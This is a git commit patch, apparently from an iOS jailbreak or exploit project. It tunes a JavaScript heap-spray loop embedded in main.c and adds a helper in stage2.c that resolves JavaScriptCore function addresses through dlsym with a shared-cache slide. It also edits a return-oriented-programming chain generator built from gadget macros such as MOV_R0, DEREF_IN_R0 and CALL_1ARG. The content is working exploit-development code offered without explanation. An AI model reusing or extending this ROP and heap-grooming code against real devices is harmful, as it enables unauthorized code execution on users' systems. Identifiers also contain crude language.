From d7cf3795b6da29a8ec7a6b7fc1245b70ff9d3dca Mon Sep 17 00:00:00 2001 From: spv Date: Fri, 22 Apr 2022 15:57:02 -0400 Subject: stuff --- src/main.c | 4 ++-- src/stage2.c | 24 ++++++++++++++---------- 2 files changed, 16 insertions(+), 12 deletions(-) (limited to 'src') diff --git a/src/main.c b/src/main.c index c3e4077..124affa 100644 --- a/src/main.c +++ b/src/main.c @@ -334,7 +334,7 @@ int main(int argc, "var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x200000; i++) {" + " for (var i = 0; i < 0x10000; i++) {" " fuck[i] = i;" " }" " delete fuck;" @@ -343,7 +343,7 @@ int main(int argc, strlen("var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x200000; i++) {" + " for (var i = 0; i < 0x10000; i++) {" " fuck[i] = i;" " }" " delete fuck;" diff --git a/src/stage2.c b/src/stage2.c index 4297e79..8b98a7e 100644 --- a/src/stage2.c +++ b/src/stage2.c @@ -230,6 +230,10 @@ uintptr_t get_dyld_shc_sym_addr(char* sym) { return dlsym(RTLD_DEFAULT, sym) - get_dyld_shc_slide(); } +uintptr_t get_dyld_shc_sym_addr_jsc(char* sym) { + return dlsym(dlopen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_LAZY) , sym) - get_dyld_shc_slide(); +} + rop_chain_shit gen_rop_chain(uint32_t base, uint32_t we_out_here_addr, uint32_t mov_r0, @@ -305,11 +309,11 @@ rop_chain_shit gen_rop_chain(uint32_t base, // uint32_t slid_b0i = 0x2b14000; - uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr("JSContextGroupCreate"); - uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr("JSGlobalContextCreateInGroup"); - uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr("JSContextGetGlobalObject"); - uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr("JSStringCreateWithUTF8CString"); - uint32_t JSEvaluateScript = get_dyld_shc_sym_addr("JSEvaluateScript"); + uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr_jsc("JSContextGroupCreate"); + uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup"); + uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject"); + uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString"); + uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript"); uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym"); MOV_R0(dlsym_); @@ -317,7 +321,7 @@ rop_chain_shit gen_rop_chain(uint32_t base, // uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday"); -// fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, stime); + fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_); /* MOV_R0(0); @@ -384,9 +388,9 @@ rop_chain_shit gen_rop_chain(uint32_t base, MOV_R1_R0(); PRINT_STILL_HERE(); -// DEREF_IN_R0(0x144444); -// MOV_R1_R0(); -// CALL_1ARG(base + printf_addr, base + dyld_shc_base_status); + DEREF_IN_R0(0x144444); + MOV_R1_R0(); + CALL_1ARG(base + printf_addr, base + dyld_shc_base_status); // CALL_1ARG(base + printf_addr, 0x109000); @@ -397,4 +401,4 @@ rop_chain_shit gen_rop_chain(uint32_t base, chain_b0i->chain_len = chain_len * 4; return chain_b0i; -} \ No newline at end of file +} -- cgit v1.2.3